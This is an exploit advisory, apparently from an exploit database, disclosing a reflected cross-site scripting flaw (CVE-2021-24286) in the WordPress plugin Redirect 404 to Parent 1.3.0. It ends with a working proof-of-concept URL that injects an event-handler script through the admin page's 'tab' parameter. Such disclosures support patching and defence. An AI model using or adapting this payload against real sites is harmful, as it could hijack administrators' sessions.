# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)# Date: 2/3/2021# Author: 0xB9# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip# Version: 1.3.0# Tested on: Windows 10# CVE: CVE-2021-242861. Description:
This plugin redirects any404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.2. Proof of Concept:
wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
